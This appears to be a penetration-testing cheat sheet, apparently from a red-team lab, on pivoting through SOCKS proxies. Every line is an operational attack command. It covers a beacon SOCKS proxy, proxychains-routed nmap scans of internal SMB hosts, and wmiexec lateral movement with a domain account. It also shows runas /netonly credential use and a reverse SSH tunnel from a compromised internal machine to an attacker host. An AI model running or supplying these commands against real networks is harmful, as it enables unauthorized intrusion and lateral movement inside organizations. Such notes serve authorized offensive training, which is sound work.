beacon> socks 1080
root@kali> echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
root@kali> proxychains nmap -n -Pn -sT -sV -p445,3380 internal-host
root@kali> proxychains python3 /usr/local/bin/wmiexec.py DEV/bfarmer@10.10.17.25
# Add Proxy
10.10.5.120 1080
# Add Rule
heidisql.exe -> 10.10.17.0/24
# Run App With Creds
runas /netonly /user:DEV\bfarmer heidisql.exe
# Foxy Proxy
10.10.5.120 1080
Socks Proxy (Dynamic Port Forwarding)
# Socks Proxy (Internal Target Machine)
https://github.com/p3nt4/Invoke-SocksProxy/blob/master/Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindIP 127.0.0.1 -bindPort 1080
# SSH (Internal Target Machine)
ssh -R 4444:127.0.0.1:1080 kali@192.168.222.76
# ProxyChains (Attacker Machine)
nano /etc/proxychains
socks4 127.0.0.1 4444
proxychains nmap -n -Pn -sT -p445 192.168.80.200
